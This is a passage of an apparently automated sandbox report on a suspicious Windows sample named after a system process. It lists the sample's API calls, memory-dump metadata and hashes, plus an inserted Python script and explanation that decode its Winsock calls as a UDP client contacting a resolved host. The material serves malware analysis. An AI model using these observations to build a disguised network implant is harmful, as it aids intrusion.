                                                                            • PeekMessageW.USER32(?,00000000,?,?,00000001), ref: 6C7BEC35
                                                                            • SendMessageW.USER32(00000000,00000084,00000000,?), ref: 6C7BEC53
                                                                            • ReleaseCapture.USER32 ref: 6C7BEC9D
                                                                            • GetMessageW.USER32(?,00000000,000000A1,000000A1), ref: 6C7BECAD
                                                                            • PeekMessageW.USER32(?,00000000,?,?,00000001), ref: 6C7BECBF
                                                                            • DispatchMessageW.USER32(?), ref: 6C7BECC6
                                                                            • PeekMessageW.USER32(?,00000000,?,?,00000001), ref: 6C7BECEC
                                                                            • GetCapture.USER32 ref: 6C7BECFC
                                                                            • ReleaseCapture.USER32 ref: 6C7BED06
                                                                            • PeekMessageW.USER32(?,00000000,00000200,00000209,00000003), ref: 6C7BED1A
                                                                            • PeekMessageW.USER32(?,00000000,?,?,00000000), ref: 6C7BED2F
                                                                            • GetMessageW.USER32(?,00000000,?,?), ref: 6C7BED42
                                                                            • TranslateMessage.USER32(?), ref: 6C7BED62
                                                                            • DispatchMessageW.USER32(?), ref: 6C7BED7D
                                                                            • GetCursorPos.USER32(00000000), ref: 6C7BED87
                                                                            • PeekMessageW.USER32(?,00000000,?,?,00000001), ref: 6C7BEDA8
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Message$Peek$Capture$DispatchRelease$CursorSendTranslate
                                                                            • String ID:
                                                                            • API String ID: 605349011-0
                                                                            • Opcode ID: 9bccff67bf7b4ef3c310fb3fefbe76692d090ebd7c723ffe0ae8382673fbbc34
                                                                            • Instruction ID: 4cb0b06797ebc377dcd44350c6344eeafadcd38bc6d86af5a4af6e1a005ab71d
                                                                            • Opcode Fuzzy Hash: 9bccff67bf7b4ef3c310fb3fefbe76692d090ebd7c723ffe0ae8382673fbbc34
                                                                            • Instruction Fuzzy Hash: C0516E70640509BBEB254F20CE89B6DBA39FB46709F1041B9F512A6A80D7B4B850DBE1
                                                                            APIs
                                                                            • Sleep.KERNEL32(00000064), ref: 1000455A
                                                                            • timeGetTime.WINMM ref: 1000457B
                                                                            • GetCurrentThreadId.KERNEL32 ref: 1000459B
                                                                            • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 100045BD
                                                                            • SwitchToThread.KERNEL32 ref: 100045D7
                                                                            • SetEvent.KERNEL32(?), ref: 10004620
                                                                            • CloseHandle.KERNEL32(?), ref: 10004644
                                                                            • send.WS2_32(?,10017440,00000010,00000000), ref: 10004668
                                                                            • SetEvent.KERNEL32(?), ref: 10004686
                                                                            • InterlockedExchange.KERNEL32(?,00000000), ref: 10004691
                                                                            • WSACloseEvent.WS2_32(?), ref: 1000469F
                                                                            • shutdown.WS2_32(?,00000001), ref: 100046B3
                                                                            • closesocket.WS2_32(?), ref: 100046BD
                                                                            • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000139F), ref: 100046F6
                                                                            • SetLastError.KERNEL32(000005B4), ref: 1000470A
                                                                            • GetCurrentThreadId.KERNEL32 ref: 1001FA44
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: EventThread$CloseCurrentErrorExchangeInterlockedLast$CompareHandleSleepSwitchTimeclosesocketsendshutdowntime
                                                                            • String ID:
                                                                            • API String ID: 3448239111-0
                                                                            • Opcode ID: 8d79b15aa9448fa8a40132b16a0a16f3e48fc421b71208ac07a5b091827d0d03
                                                                            • Instruction ID: f154daa7adb366bc59dc3c87c5a832f84626f43c2ad915a7de221fbbd04ec74e
                                                                            • Opcode Fuzzy Hash: 8d79b15aa9448fa8a40132b16a0a16f3e48fc421b71208ac07a5b091827d0d03
                                                                            • Instruction Fuzzy Hash: CC51F4B4600A22EFE311DF60CCC8B99B7A5FF09782F114115E5058B694DB72F8A0CBD5
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,?,?), ref: 6C7A2C04
                                                                            • GetProcAddress.KERNEL32(00000000,GetThreadPreferredUILanguages), ref: 6C7A2C14
                                                                            • EncodePointer.KERNEL32(00000000,?,?), ref: 6C7A2C1D
                                                                            • DecodePointer.KERNEL32(00000000,?,?), ref: 6C7A2C2B
                                                                            • GetUserDefaultUILanguage.KERNEL32(?,?), ref: 6C7A2C52
                                                                            • ___crtDownlevelLCIDToLocaleName.LIBCPMT ref: 6C7A2C62
                                                                            • ___crtDownlevelLCIDToLocaleName.LIBCPMT ref: 6C7A2C96
                                                                            • GetSystemDefaultUILanguage.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7A2CC9
                                                                            • ___crtDownlevelLCIDToLocaleName.LIBCPMT ref: 6C7A2CD9
                                                                            • ___crtDownlevelLCIDToLocaleName.LIBCPMT ref: 6C7A2D16
                                                                            • ___crtDownlevelLCIDToLocaleName.LIBCPMT ref: 6C7A2D51
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: DownlevelLocaleName___crt$DefaultLanguagePointer$AddressDecodeEncodeHandleModuleProcSystemUser
                                                                            • String ID: GetThreadPreferredUILanguages$kernel32.dll
                                                                            • API String ID: 404278886-1646127487
                                                                            • Opcode ID: 3a3d65a2dfe538a5c3866560f11fa2fd76a4d7634190d431b11c797ea5b87023
                                                                            • Instruction ID: 45c6b21f74c0a66b161ddab63a6d46543519de93f658d546c739cb1df3dbef81
                                                                            • Opcode Fuzzy Hash: 3a3d65a2dfe538a5c3866560f11fa2fd76a4d7634190d431b11c797ea5b87023
                                                                            • Instruction Fuzzy Hash: 41514D71A0021AAFCB14DFA9C988DEF77BDEF48305F100525E905E7651DB34EA0ACBA0
                                                                            APIs
                                                                            • GetClientRect.USER32(?,?), ref: 6C702E1F
                                                                            • InflateRect.USER32(?,00000000,00000000), ref: 6C702E59
                                                                            • SetRectEmpty.USER32(?), ref: 6C702EFD
                                                                            • SetRectEmpty.USER32(?), ref: 6C702F0A
                                                                            • GetSystemMetrics.USER32(00000002), ref: 6C702F2F
                                                                            • KillTimer.USER32(?,0000EC16), ref: 6C702FDF
                                                                            • EqualRect.USER32(?,?), ref: 6C702FFC
                                                                            • EqualRect.USER32(?,?), ref: 6C703011
                                                                            • EqualRect.USER32(?,?), ref: 6C703080
                                                                            • InvalidateRect.USER32(?,?,00000001), ref: 6C703095
                                                                            • InvalidateRect.USER32(?,?,00000001), ref: 6C7030A6
                                                                            • EqualRect.USER32(?,?), ref: 6C7030B9
                                                                            • InvalidateRect.USER32(?,?,00000001), ref: 6C7030CB
                                                                            • InvalidateRect.USER32(?,?,00000001), ref: 6C7030DC
                                                                            • UpdateWindow.USER32(?), ref: 6C7030ED
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$EqualInvalidate$Empty$ClientInflateKillMetricsSystemTimerUpdateWindow
                                                                            • String ID:
                                                                            • API String ID: 2140115980-0
                                                                            • Opcode ID: fbea844def4981dea85ec87346e48dedb93b4ce8955460e3b118faa4d7fb2aff
                                                                            • Instruction ID: dd3936abdf872de25e1dae404b9969e08a8696431a08d859de1ba65316c9f188
                                                                            • Opcode Fuzzy Hash: fbea844def4981dea85ec87346e48dedb93b4ce8955460e3b118faa4d7fb2aff
                                                                            • Instruction Fuzzy Hash: 6DA11AB2A0061A9FCF11CF64CA88AEE77B9FF49348F144175ED05EB645DB31A941CBA0
                                                                            APIs
                                                                            • Sleep.KERNEL32(00000064), ref: 02234531
                                                                            • timeGetTime.WINMM ref: 02234552
                                                                            • GetCurrentThreadId.KERNEL32 ref: 02234572
                                                                            • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02234594
                                                                            • SwitchToThread.KERNEL32 ref: 022345AE
                                                                            • SetEvent.KERNEL32(?), ref: 022345F7
                                                                            • CloseHandle.KERNEL32(?), ref: 0223461B
                                                                            • send.WS2_32(?,10017440,00000010,00000000), ref: 0223463F
                                                                            • SetEvent.KERNEL32(?), ref: 0223465D
                                                                            • InterlockedExchange.KERNEL32(?,00000000), ref: 02234668
                                                                            • WSACloseEvent.WS2_32(?), ref: 02234676
                                                                            • shutdown.WS2_32(?,00000001), ref: 0223468A
                                                                            • closesocket.WS2_32(?), ref: 02234694
                                                                            • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000139F), ref: 022346CD
                                                                            • SetLastError.KERNEL32(000005B4), ref: 022346E1
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3542377885.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_2230000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Event$CloseErrorExchangeInterlockedLastThread$CompareCurrentHandleSleepSwitchTimeclosesocketsendshutdowntime
                                                                            • String ID:
                                                                            • API String ID: 1063552937-0
                                                                            • Opcode ID: 5c9eb4c72f87222164f91e2bd37fc10ff7097731acfcc2078ffaff40636bb074
                                                                            • Instruction ID: ae2a658c4aa2cd8592c2991cb37d8d0e2c6d4fd6aa31908e47eb0c2d2ab1689a
                                                                            • Opcode Fuzzy Hash: 5c9eb4c72f87222164f91e2bd37fc10ff7097731acfcc2078ffaff40636bb074
                                                                            • Instruction Fuzzy Hash: 7251B2B1620722EFD726EFA4C888BA9B775FF08705F148155E5018BA98C775E5A0CFD0
                                                                            APIs
                                                                            • __EH_prolog3_GS.LIBCMT ref: 6C7029A5
                                                                            • GetClientRect.USER32(?,?), ref: 6C7029C3
                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 6C7029FC
                                                                            • CreateCompatibleBitmap.GDI32(?,?,?), ref: 6C702A51
                                                                            • CreateDIBSection.GDI32(?,?), ref: 6C702AC3
                                                                            • CreateDIBSection.GDI32(?,00000028,00000000,?,00000000,00000000), ref: 6C702AFC
                                                                            • CreateDIBSection.GDI32(?,00000028,00000000,?,00000000,00000000), ref: 6C702B2F
                                                                            • BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 6C702B97
                                                                            • GetWindowRect.USER32(?,?), ref: 6C702C06
                                                                            • BitBlt.GDI32(?,?,?,?,?,?,00000000,00000000,00CC0020), ref: 6C702D56
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Create$Section$CompatibleRect$BitmapClientH_prolog3_Window
                                                                            • String ID: (
                                                                            • API String ID: 2918208214-3887548279
                                                                            • Opcode ID: 33bc6e1f6737fc9dbefd210d006893ec8366580beddeb61dea8caba5269ad688
                                                                            • Instruction ID: ba382eb56348dd3b6073d7376927f592f4a1aaa552f6465223f1edd4abad5013
                                                                            • Opcode Fuzzy Hash: 33bc6e1f6737fc9dbefd210d006893ec8366580beddeb61dea8caba5269ad688
                                                                            • Instruction Fuzzy Hash: E3D120B2A00619EFDF15CFA8CA889EDBBB9FF08304F10412AE519A7614DB30AD55CF54
                                                                            APIs
                                                                            • socket.WS2_32(00000002,00000002,00000011), ref: 10003710
                                                                            • WSAIoctl.WS2_32(00000000,9800000C,?,00000004,00000000,00000000,?,00000000,00000000), ref: 10003749
                                                                            • setsockopt.WS2_32(?,0000FFFF,000000FB,?,00000004), ref: 10003766
                                                                            • setsockopt.WS2_32(?,0000FFFF,00000004,?,00000004), ref: 10003779
                                                                            • WSACreateEvent.WS2_32 ref: 1000377B
                                                                            • lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000,?,?,?,?,?,1001D990), ref: 1000378D
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,1001D990), ref: 10003799
                                                                            • lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,?,?,?,?,?,1001D990), ref: 100037B8
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,1001D990), ref: 100037C4
                                                                            • gethostbyname.WS2_32(00000000), ref: 100037D2
                                                                            • htons.WS2_32(?), ref: 100037F8
                                                                            • WSAEventSelect.WS2_32(?,?,00000030), ref: 10003816
                                                                            • connect.WS2_32(?,?,00000010), ref: 1000382B
                                                                            • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,1001D990), ref: 1000383A
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharEventMultiWidelstrlensetsockopt$CreateErrorIoctlLastSelectconnectgethostbynamehtonssocket
                                                                            • String ID:
                                                                            • API String ID: 1455939504-0
                                                                            • Opcode ID: 717cd69355dde577bb5fef79b8aa358efc8542f3cb33ac356917f685119aa9e6
                                                                            • Instruction ID: 3f7f27d39b3a29da93cc6ce51bc3e722b1ee51b6efc1866e7789f3871d2ad327
                                                                            • Opcode Fuzzy Hash: 717cd69355dde577bb5fef79b8aa358efc8542f3cb33ac356917f685119aa9e6
                                                                            • Instruction Fuzzy Hash: E74160B1A40205ABE711DBA4CC89F6FB7B8EB48711F108619FA159B2D0DA71A904CB60
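The Winsock sequence listed for the function at 10003710 (socket, WSAIoctl, setsockopt, WSACreateEvent, gethostbyname, htons, WSAEventSelect, connect) is shown with raw hexadecimal arguments. The helper below is an added example, not code from the Joe Sandbox report or from the analysed sample; it decodes those arguments with the constant values from winsock2.h and mswsock.h so the trace reads as what it is: a UDP client (AF_INET, SOCK_DGRAM, IPPROTO_UDP) that sets SIO_UDP_CONNRESET and SO_REUSEADDR, resolves a hostname, connects the datagram socket to a 16-byte sockaddr_in and waits on an event for FD_CONNECT|FD_CLOSE. The trace lines are copied from the APIs list above; "?" marks an argument the sandbox did not resolve, and the option value 0xFB passed to the first setsockopt is not a documented SOL_SOCKET option, so it is left undecoded.

```python
"""Decode the Winsock constants in a Joe Sandbox API trace into symbolic names.

Added example; not code from the report or the analysed sample. Constant
values are taken from winsock2.h / mswsock.h. TRACE_LINES is copied from the
APIs list of the function at 10003710; '?' is an argument the sandbox could
not resolve.
"""
import re

TRACE_LINES = [
    "• socket.WS2_32(00000002,00000002,00000011), ref: 10003710",
    "• WSAIoctl.WS2_32(00000000,9800000C,?,00000004,00000000,00000000,?,00000000,00000000), ref: 10003749",
    "• setsockopt.WS2_32(?,0000FFFF,000000FB,?,00000004), ref: 10003766",
    "• setsockopt.WS2_32(?,0000FFFF,00000004,?,00000004), ref: 10003779",
    "• WSACreateEvent.WS2_32 ref: 1000377B",
    "• lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000,?,?,?,?,?,1001D990), ref: 1000378D",
    "• WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,1001D990), ref: 10003799",
    "• lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,?,?,?,?,?,1001D990), ref: 100037B8",
    "• WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,1001D990), ref: 100037C4",
    "• gethostbyname.WS2_32(00000000), ref: 100037D2",
    "• htons.WS2_32(?), ref: 100037F8",
    "• WSAEventSelect.WS2_32(?,?,00000030), ref: 10003816",
    "• connect.WS2_32(?,?,00000010), ref: 1000382B",
    "• WSAGetLastError.WS2_32(?,?,?,?,?,?,?,1001D990), ref: 1000383A",
]

SOL_SOCKET = 0xFFFF
ADDRESS_FAMILY = {2: "AF_INET", 23: "AF_INET6"}
SOCKET_TYPE = {1: "SOCK_STREAM", 2: "SOCK_DGRAM", 3: "SOCK_RAW"}
PROTOCOL = {0: "IPPROTO_IP", 6: "IPPROTO_TCP", 17: "IPPROTO_UDP"}
SOCKOPT_LEVEL = {SOL_SOCKET: "SOL_SOCKET", 6: "IPPROTO_TCP", 17: "IPPROTO_UDP"}
# SOL_SOCKET option names (winsock2.h); only consulted when level == SOL_SOCKET.
SO_OPTION = {0x0004: "SO_REUSEADDR", 0x0008: "SO_KEEPALIVE", 0x0020: "SO_BROADCAST",
             0x1001: "SO_SNDBUF", 0x1002: "SO_RCVBUF", 0x1005: "SO_SNDTIMEO", 0x1006: "SO_RCVTIMEO"}
# _WSAIOW(IOC_VENDOR, n) = IOC_IN (0x80000000) | IOC_VENDOR (0x18000000) | n  (mswsock.h)
IOCTL_CODE = {0x98000004: "SIO_KEEPALIVE_VALS", 0x9800000C: "SIO_UDP_CONNRESET"}
# Network-event bits accepted by WSAEventSelect.
FD_EVENT = {0x01: "FD_READ", 0x02: "FD_WRITE", 0x04: "FD_OOB", 0x08: "FD_ACCEPT",
            0x10: "FD_CONNECT", 0x20: "FD_CLOSE"}
SOCKADDR_LEN = {16: "sockaddr_in", 28: "sockaddr_in6"}

# "<api>.<module>(<hex args>), ref: <addr>"; the argument list is optional (WSACreateEvent).
_CALL_RE = re.compile(r"^\W*(\w+)\.(\w+)(?:\(([^)]*)\))?,? ref: ([0-9A-Fa-f]+)$")


def parse_call(line):
    """Return (api, module, args, ref); args are ints, or None where the trace shows '?'."""
    m = _CALL_RE.match(line.strip())
    if not m:
        raise ValueError(f"unparseable trace line: {line!r}")
    api, module, raw_args, ref = m.groups()
    args = []
    if raw_args:
        for a in raw_args.split(","):
            a = a.strip()
            args.append(None if a == "?" else int(a, 16))
    return api, module, args, ref


def _sym(table, value):
    """Symbolic name for value, the raw hex if unknown, '?' if unresolved."""
    if value is None:
        return "?"
    return table.get(value, f"0x{value:X}")


def _flags(table, value):
    """Render a bit mask as NAME|NAME, keeping any bits the table does not cover as hex."""
    if value is None:
        return "?"
    names = [name for bit, name in table.items() if value & bit]
    rest = value & ~sum(table)
    if rest:
        names.append(f"0x{rest:X}")
    return "|".join(names) or "0"


def decode_call(api, args):
    """Render one WS2_32 call with its numeric constants replaced by symbolic names."""
    if api == "socket" and len(args) >= 3:
        return (f"socket({_sym(ADDRESS_FAMILY, args[0])}, "
                f"{_sym(SOCKET_TYPE, args[1])}, {_sym(PROTOCOL, args[2])})")
    if api == "WSAIoctl" and len(args) >= 2:
        return f"WSAIoctl({_sym(IOCTL_CODE, args[1])})"
    if api == "setsockopt" and len(args) >= 3:
        level, option = args[1], args[2]
        options = SO_OPTION if level == SOL_SOCKET else {}
        return f"setsockopt({_sym(SOCKOPT_LEVEL, level)}, {_sym(options, option)})"
    if api == "WSAEventSelect" and len(args) >= 3:
        return f"WSAEventSelect({_flags(FD_EVENT, args[2])})"
    if api == "connect" and len(args) >= 3:
        return f"connect({_sym(SOCKADDR_LEN, args[2])})"
    rendered = ", ".join("?" if a is None else f"0x{a:X}" for a in args)
    return f"{api}({rendered})"


def decode_socket_setup(lines):
    """Decode only the WS2_32 calls of a trace, in the order the report lists them."""
    return [decode_call(api, args) for api, module, args, _ in map(parse_call, lines)
            if module == "WS2_32"]


def summarize(lines):
    """Answer the questions an analyst asks of the trace: transport, connect, DNS, CONNRESET."""
    ws2 = [(api, args) for api, module, args, _ in map(parse_call, lines) if module == "WS2_32"]
    sock = next((args for api, args in ws2 if api == "socket"), None)
    return {
        "transport": {1: "TCP", 2: "UDP"}.get(sock[1]) if sock else None,
        "connects": any(api == "connect" for api, _ in ws2),
        "resolves_hostname": any(api in ("gethostbyname", "getaddrinfo", "GetAddrInfoW")
                                 for api, _ in ws2),
        "suppresses_udp_connreset": any(api == "WSAIoctl" and len(args) > 1
                                        and args[1] == 0x9800000C for api, args in ws2),
    }


if __name__ == "__main__":
    for entry in decode_socket_setup(TRACE_LINES):
        print(entry)
    print(summarize(TRACE_LINES))
```

Read together, the decoded calls describe a UDP client: it resolves a hostname, connects the datagram socket to a single peer (a 16-byte sockaddr_in, so IPv4) and then waits on a WSA event for FD_CONNECT or FD_CLOSE instead of blocking. SIO_UDP_CONNRESET controls whether an ICMP port-unreachable from that peer surfaces as WSAECONNRESET on the next receive; the boolean passed to it is unresolved in the trace ("?"), so the report does not show which way it was set, only that the sample cares about the behaviour.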
                                                                            APIs
                                                                            • __EH_prolog3.LIBCMT ref: 6C72AA16
                                                                            • CreatePopupMenu.USER32 ref: 6C72AA4F
                                                                            • AppendMenuW.USER32(00000000,?,?,?), ref: 6C72AB1D
                                                                            • AppendMenuW.USER32(00000000,?,00000000,-00000010), ref: 6C72AB93
                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C72AB9F
                                                                            • AppendMenuW.USER32(00000000,00000800,00000000,00000000), ref: 6C72ABC6
                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C72ABDE
                                                                            • SetMenuDefaultItem.USER32(00000000,?,00000000,00000000), ref: 6C72AC12
                                                                            • IsWindow.USER32(?), ref: 6C72AC5E
                                                                            • IsWindow.USER32(?), ref: 6C72AD19
                                                                            • InflateRect.USER32(?,?,?), ref: 6C72AD3C
                                                                            • InvalidateRect.USER32(?,?,00000001), ref: 6C72AD4E
                                                                            • UpdateWindow.USER32(?), ref: 6C72AD5A
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$AppendWindow$ErrorLastRect$CreateDefaultH_prolog3InflateInvalidateItemPopupUpdate
                                                                            • String ID:
                                                                            • API String ID: 2999842293-0
                                                                            • Opcode ID: a94959ab6db976de527c4c4e25d401479dccad6a5b20bff5468a1f435daaa972
                                                                            • Instruction ID: 1fa5cef80a2d04c6e8feb3f4de69717ef2115ec4a1dee691964205f2825d6fc6
                                                                            • Opcode Fuzzy Hash: a94959ab6db976de527c4c4e25d401479dccad6a5b20bff5468a1f435daaa972
                                                                            • Instruction Fuzzy Hash: C6A1CD71A01205DFDF10CF64CA88BAE77B1BF49328F144179E816AB791DB38AD05CBA0
                                                                            APIs
                                                                            • __EH_prolog3_GS.LIBCMT ref: 6C724DFD
                                                                            • GetObjectW.GDI32(00000000,00000018,?), ref: 6C724E3B
                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 6C724E7A
                                                                            • SelectObject.GDI32(?,00000000), ref: 6C724E9D
                                                                            • GetObjectW.GDI32(?,00000054,?), ref: 6C724EEA
                                                                            • CreateDIBSection.GDI32(?,?), ref: 6C724F4C
                                                                            • CreateCompatibleDC.GDI32(?), ref: 6C724F86
                                                                            • SelectObject.GDI32(?,00000000), ref: 6C724F9F
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
